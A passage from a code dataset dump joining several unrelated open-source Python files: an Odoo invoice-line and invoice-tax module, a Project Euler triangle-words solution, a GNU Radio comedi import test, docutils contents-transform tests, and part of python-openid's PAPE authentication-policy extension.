writeoff_acc_id, writeoff_period_id, writeoff_journal_id, name=name)
class account_invoice_line(models.Model):
_name = "account.invoice.line"
_description = "Invoice Line"
_order = "invoice_id,sequence,id"
@api.one
@api.depends('price_unit', 'discount', 'invoice_line_tax_id', 'quantity',
'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id')
def _compute_price(self):
price = self.price_unit * (1 - (self.discount or 0.0) / 100.0)
taxes = self.invoice_line_tax_id.compute_all(price, self.quantity, product=self.product_id, partner=self.invoice_id.partner_id)
self.price_subtotal = taxes['total']
if self.invoice_id:
self.price_subtotal = self.invoice_id.currency_id.round(self.price_subtotal)
@api.model
def _default_price_unit(self):
if not self._context.get('check_total'):
return 0
total = self._context['check_total']
for l in self._context.get('invoice_line', []):
if isinstance(l, (list, tuple)) and len(l) >= 3 and l[2]:
vals = l[2]
price = vals.get('price_unit', 0) * (1 - vals.get('discount', 0) / 100.0)
total = total - (price * vals.get('quantity'))
taxes = vals.get('invoice_line_tax_id')
if taxes and len(taxes[0]) >= 3 and taxes[0][2]:
taxes = self.env['account.tax'].browse(taxes[0][2])
tax_res = taxes.compute_all(price, vals.get('quantity'),
product=vals.get('product_id'), partner=self._context.get('partner_id'))
for tax in tax_res['taxes']:
total = total - tax['amount']
return total
@api.model
def _default_account(self):
# XXX this gets the default account for the user's company,
# it should get the default account for the invoice's company
# however, the invoice's company does not reach this point
if self._context.get('type') in ('out_invoice', 'out_refund'):
return self.env['ir.property'].get('property_account_income_categ', 'product.category')
else:
return self.env['ir.property'].get('property_account_expense_categ', 'product.category')
name = fields.Text(string='Description', required=True)
origin = fields.Char(string='Source Document',
help="Reference of the document that produced this invoice.")
sequence = fields.Integer(string='Sequence', default=10,
help="Gives the sequence of this line when displaying the invoice.")
invoice_id = fields.Many2one('account.invoice', string='Invoice Reference',
ondelete='cascade', index=True)
uos_id = fields.Many2one('product.uom', string='Unit of Measure',
ondelete='set null', index=True)
product_id = fields.Many2one('product.product', string='Product',
ondelete='restrict', index=True)
account_id = fields.Many2one('account.account', string='Account',
required=True, domain=[('type', 'not in', ['view', 'closed'])],
default=_default_account,
help="The income or expense account related to the selected product.")
price_unit = fields.Float(string='Unit Price', required=True,
digits= dp.get_precision('Product Price'),
default=_default_price_unit)
price_subtotal = fields.Float(string='Amount', digits= dp.get_precision('Account'),
store=True, readonly=True, compute='_compute_price')
quantity = fields.Float(string='Quantity', digits= dp.get_precision('Product Unit of Measure'),
required=True, default=1)
discount = fields.Float(string='Discount (%)', digits= dp.get_precision('Discount'),
default=0.0)
invoice_line_tax_id = fields.Many2many('account.tax',
'account_invoice_line_tax', 'invoice_line_id', 'tax_id',
string='Taxes', domain=[('parent_id', '=', False)])
account_analytic_id = fields.Many2one('account.analytic.account',
string='Analytic Account')
company_id = fields.Many2one('res.company', string='Company',
related='invoice_id.company_id', store=True, readonly=True)
partner_id = fields.Many2one('res.partner', string='Partner',
related='invoice_id.partner_id', store=True, readonly=True)
@api.model
def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):
res = super(account_invoice_line, self).fields_view_get(
view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
if self._context.get('type'):
doc = etree.XML(res['arch'])
for node in doc.xpath("//field[@name='product_id']"):
if self._context['type'] in ('in_invoice', 'in_refund'):
node.set('domain', "[('purchase_ok', '=', True)]")
else:
node.set('domain', "[('sale_ok', '=', True)]")
res['arch'] = etree.tostring(doc)
return res
@api.multi
def product_id_change(self, product, uom_id, qty=0, name='', type='out_invoice',
partner_id=False, fposition_id=False, price_unit=False, currency_id=False,
company_id=None):
context = self._context
company_id = company_id if company_id is not None else context.get('company_id', False)
self = self.with_context(company_id=company_id, force_company=company_id)
if not partner_id:
raise except_orm(_('No Partner Defined!'), _("You must first select a partner!"))
if not product:
if type in ('in_invoice', 'in_refund'):
return {'value': {}, 'domain': {'uos_id': []}}
else:
return {'value': {'price_unit': 0.0}, 'domain': {'uos_id': []}}
values = {}
part = self.env['res.partner'].browse(partner_id)
fpos = self.env['account.fiscal.position'].browse(fposition_id)
if part.lang:
self = self.with_context(lang=part.lang)
product = self.env['product.product'].browse(product)
values['name'] = product.partner_ref
if type in ('out_invoice', 'out_refund'):
account = product.property_account_income or product.categ_id.property_account_income_categ
else:
account = product.property_account_expense or product.categ_id.property_account_expense_categ
account = fpos.map_account(account)
if account:
values['account_id'] = account.id
if type in ('out_invoice', 'out_refund'):
taxes = product.taxes_id or account.tax_ids
if product.description_sale:
values['name'] += '\n' + product.description_sale
else:
taxes = product.supplier_taxes_id or account.tax_ids
if product.description_purchase:
values['name'] += '\n' + product.description_purchase
taxes = fpos.map_tax(taxes)
values['invoice_line_tax_id'] = taxes.ids
if type in ('in_invoice', 'in_refund'):
values['price_unit'] = price_unit or product.standard_price
else:
values['price_unit'] = product.lst_price
values['uos_id'] = product.uom_id.id
if uom_id:
uom = self.env['product.uom'].browse(uom_id)
if product.uom_id.category_id.id == uom.category_id.id:
values['uos_id'] = uom_id
domain = {'uos_id': [('category_id', '=', product.uom_id.category_id.id)]}
company = self.env['res.company'].browse(company_id)
currency = self.env['res.currency'].browse(currency_id)
if company and currency:
if company.currency_id != currency:
if type in ('in_invoice', 'in_refund'):
values['price_unit'] = product.standard_price
values['price_unit'] = values['price_unit'] * currency.rate
if values['uos_id'] and values['uos_id'] != product.uom_id.id:
values['price_unit'] = self.env['product.uom']._compute_price(
product.uom_id.id, values['price_unit'], values['uos_id'])
return {'value': values, 'domain': domain}
@api.multi
def uos_id_change(self, product, uom, qty=0, name='', type='out_invoice', partner_id=False,
fposition_id=False, price_unit=False, currency_id=False, company_id=None):
context = self._context
company_id = company_id if company_id != None else context.get('company_id', False)
self = self.with_context(company_id=company_id)
result = self.product_id_change(
product, uom, qty, name, type, partner_id, fposition_id, price_unit,
currency_id, company_id=company_id,
)
warning = {}
if not uom:
result['value']['price_unit'] = 0.0
if product and uom:
prod = self.env['product.product'].browse(product)
prod_uom = self.env['product.uom'].browse(uom)
if prod.uom_id.category_id != prod_uom.category_id:
warning = {
'title': _('Warning!'),
'message': _('The selected unit of measure is not compatible with the unit of measure of the product.'),
}
result['value']['uos_id'] = prod.uom_id.id
if warning:
result['warning'] = warning
return result
@api.model
def move_line_get(self, invoice_id):
inv = self.env['account.invoice'].browse(invoice_id)
currency = inv.currency_id.with_context(date=inv.date_invoice)
company_currency = inv.company_id.currency_id
res = []
for line in inv.invoice_line:
mres = self.move_line_get_item(line)
mres['invl_id'] = line.id
res.append(mres)
tax_code_found = False
taxes = line.invoice_line_tax_id.compute_all(
(line.price_unit * (1.0 - (line.discount or 0.0) / 100.0)),
line.quantity, line.product_id, inv.partner_id)['taxes']
for tax in taxes:
if inv.type in ('out_invoice', 'in_invoice'):
tax_code_id = tax['base_code_id']
tax_amount = tax['price_unit'] * line.quantity * tax['base_sign']
else:
tax_code_id = tax['ref_base_code_id']
tax_amount = tax['price_unit'] * line.quantity * tax['ref_base_sign']
if tax_code_found:
if not tax_code_id:
continue
res.append(dict(mres))
res[-1]['price'] = 0.0
res[-1]['account_analytic_id'] = False
elif not tax_code_id:
continue
tax_code_found = True
res[-1]['tax_code_id'] = tax_code_id
res[-1]['tax_amount'] = currency.compute(tax_amount, company_currency)
return res
@api.model
def move_line_get_item(self, line):
return {
'type': 'src',
'name': line.name.split('\n')[0][:64],
'price_unit': line.price_unit,
'quantity': line.quantity,
'price': line.price_subtotal,
'account_id': line.account_id.id,
'product_id': line.product_id.id,
'uos_id': line.uos_id.id,
'account_analytic_id': line.account_analytic_id.id,
'taxes': line.invoice_line_tax_id,
}
#
# Set the tax field according to the account and the fiscal position
#
@api.multi
def onchange_account_id(self, product_id, partner_id, inv_type, fposition_id, account_id):
if not account_id:
return {}
unique_tax_ids = []
account = self.env['account.account'].browse(account_id)
if not product_id:
fpos = self.env['account.fiscal.position'].browse(fposition_id)
unique_tax_ids = fpos.map_tax(account.tax_ids).ids
else:
product_change_result = self.product_id_change(product_id, False, type=inv_type,
partner_id=partner_id, fposition_id=fposition_id, company_id=account.company_id.id)
if 'invoice_line_tax_id' in product_change_result.get('value', {}):
unique_tax_ids = product_change_result['value']['invoice_line_tax_id']
return {'value': {'invoice_line_tax_id': unique_tax_ids}}
class account_invoice_tax(models.Model):
_name = "account.invoice.tax"
_description = "Invoice Tax"
_order = 'sequence'
@api.one
@api.depends('base', 'base_amount', 'amount', 'tax_amount')
def _compute_factors(self):
self.factor_base = self.base_amount / self.base if self.base else 1.0
self.factor_tax = self.tax_amount / self.amount if self.amount else 1.0
invoice_id = fields.Many2one('account.invoice', string='Invoice Line',
ondelete='cascade', index=True)
name = fields.Char(string='Tax Description',
required=True)
account_id = fields.Many2one('account.account', string='Tax Account',
required=True, domain=[('type', 'not in', ['view', 'income', 'closed'])])
account_analytic_id = fields.Many2one('account.analytic.account', string='Analytic account')
base = fields.Float(string='Base', digits=dp.get_precision('Account'))
amount = fields.Float(string='Amount', digits=dp.get_precision('Account'))
manual = fields.Boolean(string='Manual', default=True)
sequence = fields.Integer(string='Sequence',
help="Gives the sequence order when displaying a list of invoice tax.")
base_code_id = fields.Many2one('account.tax.code', string='Base Code',
help="The account basis of the tax declaration.")
base_amount = fields.Float(string='Base Code Amount', digits=dp.get_precision('Account'),
default=0.0)
tax_code_id = fields.Many2one('account.tax.code', string='Tax Code',
help="The tax basis of the tax declaration.")
tax_amount = fields.Float(string='Tax Code Amount', digits=dp.get_precision('Account'),
default=0.0)
company_id = fields.Many2one('res.company', string='Company',
related='account_id.company_id', store=True, readonly=True)
factor_base = fields.Float(string='Multipication factor for Base code',
compute='_compute_factors')
factor_tax = fields.Float(string='Multipication factor Tax code',
compute='_compute_factors')
@api.multi
def base_change(self, base, currency_id=False, company_id=False, date_invoice=False):
factor = self.factor_base if self else 1
company = self.env['res.company'].browse(company_id)
if currency_id and company.currency_id:
currency = self.env['res.currency'].browse(currency_id)
currency = currency.with_context(date=date_invoice or fields.Date.context_today(self))
base = currency.compute(base * factor, company.currency_id, round=False)
return {'value': {'base_amount': base}}
@api.multi
def amount_change(self, amount, currency_id=False, company_id=False, date_invoice=False):
company = self.env['res.company'].browse(company_id)
if currency_id and company.currency_id:
currency = self.env['res.currency'].browse(currency_id)
currency = currency.with_context(date=date_invoice or fields.Date.context_today(self))
amount = currency.compute(amount, company.currency_id, round=False)
return {'value': {'tax_amount': amount}}
@api.v8
def compute(self, invoice):
tax_grouped = {}
currency = invoice.currency_id.with_context(date=invoice.date_invoice or fields.Date.context_today(invoice))
company_currency = invoice.company_id.currency_id
for line in invoice.invoice_line:
taxes = line.invoice_line_tax_id.compute_all(
(line.price_unit * (1 - (line.discount or 0.0) / 100.0)),
line.quantity, line.product_id, invoice.partner_id)['taxes']
for tax in taxes:
val = {
'invoice_id': invoice.id,
'name': tax['name'],
'amount': tax['amount'],
'manual': False,
'sequence': tax['sequence'],
'base': currency.round(tax['price_unit'] * line['quantity']),
}
if invoice.type in ('out_invoice','in_invoice'):
val['base_code_id'] = tax['base_code_id']
val['tax_code_id'] = tax['tax_code_id']
val['base_amount'] = currency.compute(val['base'] * tax['base_sign'], company_currency, round=False)
val['tax_amount'] = currency.compute(val['amount'] * tax['tax_sign'], company_currency, round=False)
val['account_id'] = tax['account_collected_id'] or line.account_id.id
val['account_analytic_id'] = tax['account_analytic_collected_id']
else:
val['base_code_id'] = tax['ref_base_code_id']
val['tax_code_id'] = tax['ref_tax_code_id']
val['base_amount'] = currency.compute(val['base'] * tax['ref_base_sign'], company_currency, round=False)
val['tax_amount'] = currency.compute(val['amount'] * tax['ref_tax_sign'], company_currency, round=False)
val['account_id'] = tax['account_paid_id'] or line.account_id.id
val['account_analytic_id'] = tax['account_analytic_paid_id']
# If the taxes generate moves on the same financial account as the invoice line
# and no default analytic account is defined at the tax level, propagate the
# analytic account from the invoice line to the tax line. This is necessary
# in situations were (part of) the taxes cannot be reclaimed,
# to ensure the tax move is allocated to the proper analytic account.
if not val.get('account_analytic_id') and line.account_analytic_id and val['account_id'] == line.account_id.id:
val['account_analytic_id'] = line.account_analytic_id.id
key = (val['tax_code_id'], val['base_code_id'], val['account_id'])
if not key in tax_grouped:
tax_grouped[key] = val
else:
tax_grouped[key]['base'] += val['base']
tax_grouped[key]['amount'] += val['amount']
tax_grouped[key]['base_amount'] += val['base_amount']
tax_grouped[key]['tax_amount'] += val['tax_amount']
for t in tax_grouped.values():
t['base'] = currency.round(t['base'])
t['amount'] = currency.round(t['amount'])
t['base_amount'] = currency.round(t['base_amount'])
t['tax_amount'] = currency.round(t['tax_amount'])
return tax_grouped
@api.v7
def compute(self, cr, uid, invoice_id, context=None):
recs = self.browse(cr, uid, [], context)
invoice = recs.env['account.invoice'].browse(invoice_id)
return recs.compute(invoice)
@api.model
def move_line_get(self, invoice_id):
res = []
self._cr.execute(
'SELECT * FROM account_invoice_tax WHERE invoice_id = %s',
(invoice_id,)
)
for row in self._cr.dictfetchall():
if not (row['amount'] or row['tax_code_id'] or row['tax_amount']):
continue
res.append({
'type': 'tax',
'name': row['name'],
'price_unit': row['amount'],
'quantity': 1,
'price': row['amount'] or 0.0,
'account_id': row['account_id'],
'tax_code_id': row['tax_code_id'],
'tax_amount': row['tax_amount'],
'account_analytic_id': row['account_analytic_id'],
})
return res
class res_partner(models.Model):
# Inherits partner and adds invoice information in the partner form
_inherit = 'res.partner'
invoice_ids = fields.One2many('account.invoice', 'partner_id', string='Invoices',
readonly=True, copy=False)
def _find_accounting_partner(self, partner):
'''
Find the partner for which the accounting entries will be created
'''
return partner.commercial_partner_id
class mail_compose_message(models.Model):
_inherit = 'mail.compose.message'
@api.multi
def send_mail(self):
context = self._context
if context.get('default_model') == 'account.invoice' and \
context.get('default_res_id') and context.get('mark_invoice_as_sent'):
invoice = self.env['account.invoice'].browse(context['default_res_id'])
invoice = invoice.with_context(mail_post_autofollow=True)
invoice.write({'sent': True})
invoice.message_post(body=_("Invoice sent"))
return super(mail_compose_message, self).send_mail()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
beyoungwoo/C_glibc_Sample
|
_Algorithm/ProjectEuler_python/euler_42.py
|
1
|
2038
|
#!/usr/bin/python -Wall
# -*- coding: utf-8 -*-
"""
<div id="content">
<div style="text-align:center;" class="print"><img src="images/print_page_logo.png" alt="projecteuler.net" style="border:none;" /></div>
<h2>Coded triangle numbers</h2><div id="problem_info" class="info"><h3>Problem 42</h3><span>Published on Friday, 25th April 2003, 06:00 pm; Solved by 46003; Difficulty rating: 5%</span></div>
<div class="problem_content" role="problem">
<p>The <i>n</i><sup>th</sup> term of the sequence of triangle numbers is given by, <i>t<sub>n</sub></i> = ½<i>n</i>(<i>n</i>+1); so the first ten triangle numbers are:</p>
<p style="text-align:center;">1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...</p>
<p>By converting each letter in a word to a number corresponding to its alphabetical position and adding these values we form a word value. For example, the word value for SKY is 19 + 11 + 25 = 55 = <i>t</i><sub>10</sub>. If the word value is a triangle number then we shall call the word a triangle word.</p>
<p>Using <a href="project/resources/p042_words.txt">words.txt</a> (right click and 'Save Link/Target As...'), a 16K text file containing nearly two-thousand common English words, how many are triangle words?</p>
</div><br />
<br /></div>
"""
import re
tri=[ ]
for i in range (1, 50):
res = (i*(i+1)/2)
tri.append(res)
def is_triangle(num):
global tri
tri_len = len(tri)
for i in range(0, tri_len):
if (num == tri[i]):
return True
elif (num < tri[i]):
return False
return False
count = 0
fread = open("p42words.txt", "r")
for line in fread:
text = re.split("\"", line)
total_text = list(text)
len_t = len(total_text)
for i in range(0, len_t):
if total_text[i].startswith(','):
continue
ret = [ord(c) for c in total_text[i]]
len_ret = len(ret)
if (is_triangle(sum(ret) - (64 * len_ret)) == True):
count += 1
print total_text[i], sum(ret) - (64 * len_ret)
print "total=", count
#a = 'hi'
#print [ord(c) for c in a]
|
gpl-3.0
|
pgoeser/gnuradio
|
gr-comedi/src/qa_comedi.py
|
15
|
1240
|
#!/usr/bin/env python
#
# Copyright 2005,2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import comedi
class qa_comedi (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_000_nop (self):
"""Just see if we can import the module...
They may not have COMEDI library, etc. Don't try to run anything"""
pass
if __name__ == '__main__':
gr_unittest.main ()
|
gpl-3.0
|
ojengwa/oh-mainline
|
vendor/packages/docutils/test/test_transforms/test_contents.py
|
19
|
10659
|
#! /usr/bin/env python
# $Id: test_contents.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Tests for `docutils.transforms.parts.Contents` (via
`docutils.transforms.universal.LastReaderPending`).
"""
from __init__ import DocutilsTestSupport
from docutils.transforms.references import Substitutions
from docutils.parsers.rst import Parser
def suite():
parser = Parser()
s = DocutilsTestSupport.TransformTestSuite(parser)
s.generateTests(totest)
return s
totest = {}
totest['tables_of_contents'] = ((Substitutions,), [
["""\
.. contents::
Title 1
=======
Paragraph 1.
Title_ 2
--------
Paragraph 2.
_`Title` 3
``````````
Paragraph 3.
Title 4
-------
Paragraph 4.
""",
"""\
<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title
2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id3" refid="title-3">
Title
3
<list_item>
<paragraph>
<reference ids="id4" refid="title-4">
Title 4
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title>
<reference name="Title" refname="title">
Title
2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title refid="id3">
<target ids="title" names="title">
Title
3
<paragraph>
Paragraph 3.
<section ids="title-4" names="title\ 4">
<title refid="id4">
Title 4
<paragraph>
Paragraph 4.
"""],
["""\
.. contents:: Table of Contents
Title 1
=======
Paragraph 1.
Title 2
-------
Paragraph 2.
""",
"""\
<document source="test data">
<topic classes="contents" ids="table-of-contents" names="table\ of\ contents">
<title>
Table of Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title 2
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id2">
Title 2
<paragraph>
Paragraph 2.
"""],
["""\
.. contents:: There's an image in Title 2
Title 1
=======
Paragraph 1.
|Title 2|
=========
Paragraph 2.
.. |Title 2| image:: title2.png
""",
"""\
<document source="test data">
<topic classes="contents" ids="there-s-an-image-in-title-2" names="there's\ an\ image\ in\ title\ 2">
<title>
There's an image in Title 2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title 2
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id2">
<image alt="Title 2" uri="title2.png">
<paragraph>
Paragraph 2.
<substitution_definition names="Title\ 2">
<image alt="Title 2" uri="title2.png">
"""], # emacs cruft: "
["""\
.. contents::
:depth: 2
Title 1
=======
Paragraph 1.
Title 2
-------
Paragraph 2.
Title 3
```````
Paragraph 3.
Title 4
-------
Paragraph 4.
""",
"""\
<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title 2
<list_item>
<paragraph>
<reference ids="id3" refid="title-4">
Title 4
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id2">
Title 2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title>
Title 3
<paragraph>
Paragraph 3.
<section ids="title-4" names="title\ 4">
<title refid="id3">
Title 4
<paragraph>
Paragraph 4.
"""],
["""\
Title 1
=======
.. contents::
:local:
Paragraph 1.
Title 2
-------
Paragraph 2.
Title 3
```````
Paragraph 3.
Title 4
-------
Paragraph 4.
""",
"""\
<document source="test data">
<section ids="title-1" names="title\ 1">
<title>
Title 1
<topic classes="contents local" ids="contents" names="contents">
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-2">
Title 2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-3">
Title 3
<list_item>
<paragraph>
<reference ids="id3" refid="title-4">
Title 4
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id1">
Title 2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title refid="id2">
Title 3
<paragraph>
Paragraph 3.
<section ids="title-4" names="title\ 4">
<title refid="id3">
Title 4
<paragraph>
Paragraph 4.
"""],
["""\
.. contents::
:local:
Test duplicate name "Contents".
Section
--------
Paragraph.
""",
"""\
<document source="test data">
<topic classes="contents local" ids="contents" names="contents">
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="section">
Section
<paragraph>
Test duplicate name "Contents".
<section ids="section" names="section">
<title refid="id1">
Section
<paragraph>
Paragraph.
"""],
["""\
.. contents::
:backlinks: top
Section
--------
Paragraph.
""",
"""\
<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="section">
Section
<section ids="section" names="section">
<title refid="contents">
Section
<paragraph>
Paragraph.
"""],
["""\
.. contents::
:backlinks: none
Section
--------
Paragraph.
""",
"""\
<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="section">
Section
<section ids="section" names="section">
<title>
Section
<paragraph>
Paragraph.
"""],
["""\
.. contents::
Degenerate case, no table of contents generated.
""",
"""\
<document source="test data">
<paragraph>
Degenerate case, no table of contents generated.
"""],
["""\
Title 1
=======
Paragraph 1.
.. sidebar:: Contents
.. contents::
:local:
Title 2
-------
Paragraph 2.
Title 3
```````
Paragraph 3.
""",
"""\
<document source="test data">
<section ids="title-1" names="title\ 1">
<title>
Title 1
<paragraph>
Paragraph 1.
<sidebar>
<title>
Contents
<topic classes="contents local" ids="contents" names="contents">
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-2">
Title 2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-3">
Title 3
<section ids="title-2" names="title\ 2">
<title refid="id1">
Title 2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title refid="id2">
Title 3
<paragraph>
Paragraph 3.
"""],
])
if __name__ == '__main__':
import unittest
unittest.main(defaultTest='suite')
|
agpl-3.0
|
zorroz/microblog
|
flask/lib/python2.7/site-packages/openid/extensions/draft/pape2.py
|
156
|
9330
|
"""An implementation of the OpenID Provider Authentication Policy
Extension 1.0
@see: http://openid.net/developers/specs/
@since: 2.1.0
"""
__all__ = [
'Request',
'Response',
'ns_uri',
'AUTH_PHISHING_RESISTANT',
'AUTH_MULTI_FACTOR',
'AUTH_MULTI_FACTOR_PHYSICAL',
]
from openid.extension import Extension
import re
ns_uri = "http://specs.openid.net/extensions/pape/1.0"
AUTH_MULTI_FACTOR_PHYSICAL = \
'http://schemas.openid.net/pape/policies/2007/06/multi-factor-physical'
AUTH_MULTI_FACTOR = \
'http://schemas.openid.net/pape/policies/2007/06/multi-factor'
AUTH_PHISHING_RESISTANT = \
'http://schemas.openid.net/pape/policies/2007/06/phishing-resistant'
TIME_VALIDATOR = re.compile('^\d\d\d\d-\d\d-\d\dT\d\d:\d\d:\d\dZ$')
class Request(Extension):
"""A Provider Authentication Policy request, sent from a relying
party to a provider
@ivar preferred_auth_policies: The authentication policies that
the relying party prefers
@type preferred_auth_policies: [str]
@ivar max_auth_age: The maximum time, in seconds, that the relying
party wants to allow to have elapsed before the user must
re-authenticate
@type max_auth_age: int or NoneType
"""
ns_alias = 'pape'
def __init__(self, preferred_auth_policies=None, max_auth_age=None):
super(Request, self).__init__()
if not preferred_auth_policies:
preferred_auth_policies = []
self.preferred_auth_policies = preferred_auth_policies
self.max_auth_age = max_auth_age
def __nonzero__(self):
return bool(self.preferred_auth_policies or
self.max_auth_age is not None)
def addPolicyURI(self, policy_uri):
"""Add an acceptable authentication policy URI to this request
This method is intended to be used by the relying party to add
acceptable authentication types to the request.
@param policy_uri: The identifier for the preferred type of
authentication.
@see: http://openid.net/specs/openid-provider-authentication-policy-extension-1_0-01.html#auth_policies
"""
if policy_uri not in self.preferred_auth_policies:
self.preferred_auth_policies.append(policy_uri)
def getExtensionArgs(self):
"""@see: C{L{Extension.getExtensionArgs}}
"""
ns_args = {
'preferred_auth_policies':' '.join(self.preferred_auth_policies)
}
if self.max_auth_age is not None:
ns_args['max_auth_age'] = str(self.max_auth_age)
return ns_args
def fromOpenIDRequest(cls, request):
"""Instantiate a Request object from the arguments in a
C{checkid_*} OpenID message
"""
self = cls()
args = request.message.getArgs(self.ns_uri)
if args == {}:
return None
self.parseExtensionArgs(args)
return self
fromOpenIDRequest = classmethod(fromOpenIDRequest)
def parseExtensionArgs(self, args):
"""Set the state of this request to be that expressed in these
PAPE arguments
@param args: The PAPE arguments without a namespace
@rtype: None
@raises ValueError: When the max_auth_age is not parseable as
an integer
"""
# preferred_auth_policies is a space-separated list of policy URIs
self.preferred_auth_policies = []
policies_str = args.get('preferred_auth_policies')
if policies_str:
for uri in policies_str.split(' '):
if uri not in self.preferred_auth_policies:
self.preferred_auth_policies.append(uri)
# max_auth_age is base-10 integer number of seconds
max_auth_age_str = args.get('max_auth_age')
self.max_auth_age = None
if max_auth_age_str:
try:
self.max_auth_age = int(max_auth_age_str)
except ValueError:
pass
def preferredTypes(self, supported_types):
"""Given a list of authentication policy URIs that a provider
supports, this method returns the subsequence of those types
that are preferred by the relying party.
@param supported_types: A sequence of authentication policy
type URIs that are supported by a provider
@returns: The sub-sequence of the supported types that are
preferred by the relying party. This list will be ordered
in the order that the types appear in the supported_types
sequence, and may be empty if the provider does not prefer
any of the supported authentication types.
@returntype: [str]
"""
return filter(self.preferred_auth_policies.__contains__,
supported_types)
Request.ns_uri = ns_uri
class Response(Extension):
"""A Provider Authentication Policy response, sent from a provider
to a relying party
"""
ns_alias = 'pape'
def __init__(self, auth_policies=None, auth_time=None,
nist_auth_level=None):
super(Response, self).__init__()
if auth_policies:
self.auth_policies = auth_policies
else:
self.auth_policies = []
self.auth_time = auth_time
self.nist_auth_level = nist_auth_level
def addPolicyURI(self, policy_uri):
"""Add a authentication policy to this response
This method is intended to be used by the provider to add a
policy that the provider conformed to when authenticating the user.
@param policy_uri: The identifier for the preferred type of
authentication.
@see: http://openid.net/specs/openid-provider-authentication-policy-extension-1_0-01.html#auth_policies
"""
if policy_uri not in self.auth_policies:
self.auth_policies.append(policy_uri)
def fromSuccessResponse(cls, success_response):
"""Create a C{L{Response}} object from a successful OpenID
library response
(C{L{openid.consumer.consumer.SuccessResponse}}) response
message
@param success_response: A SuccessResponse from consumer.complete()
@type success_response: C{L{openid.consumer.consumer.SuccessResponse}}
@rtype: Response or None
@returns: A provider authentication policy response from the
data that was supplied with the C{id_res} response or None
if the provider sent no signed PAPE response arguments.
"""
self = cls()
# PAPE requires that the args be signed.
args = success_response.getSignedNS(self.ns_uri)
# Only try to construct a PAPE response if the arguments were
# signed in the OpenID response. If not, return None.
if args is not None:
self.parseExtensionArgs(args)
return self
else:
return None
def parseExtensionArgs(self, args, strict=False):
"""Parse the provider authentication policy arguments into the
internal state of this object
@param args: unqualified provider authentication policy
arguments
@param strict: Whether to raise an exception when bad data is
encountered
@returns: None. The data is parsed into the internal fields of
this object.
"""
policies_str = args.get('auth_policies')
if policies_str and policies_str != 'none':
self.auth_policies = policies_str.split(' ')
nist_level_str = args.get('nist_auth_level')
if nist_level_str:
try:
nist_level = int(nist_level_str)
except ValueError:
if strict:
raise ValueError('nist_auth_level must be an integer between '
'zero and four, inclusive')
else:
self.nist_auth_level = None
else:
if 0 <= nist_level < 5:
self.nist_auth_level = nist_level
auth_time = args.get('auth_time')
if auth_time:
if TIME_VALIDATOR.match(auth_time):
self.auth_time = auth_time
elif strict:
raise ValueError("auth_time must be in RFC3339 format")
fromSuccessResponse = classmethod(fromSuccessResponse)
def getExtensionArgs(self):
"""@see: C{L{Extension.getExtensionArgs}}
"""
if len(self.auth_policies) == 0:
ns_args = {
'auth_policies':'none',
}
else:
ns_args = {
'auth_policies':' '.join(self.auth_policies),
}
if self.nist_auth_level is not None:
if self.nist_auth_level not in range(0, 5):
raise ValueError('nist_auth_level must be an integer between '
'zero and four, inclusive')
ns_args['nist_auth_level'] = str(self.nist_auth_level)
if self.auth_time is not None:
if not TIME_VALIDATOR.match(self.auth_time):
raise ValueError('auth_time must be in RFC3339 format')
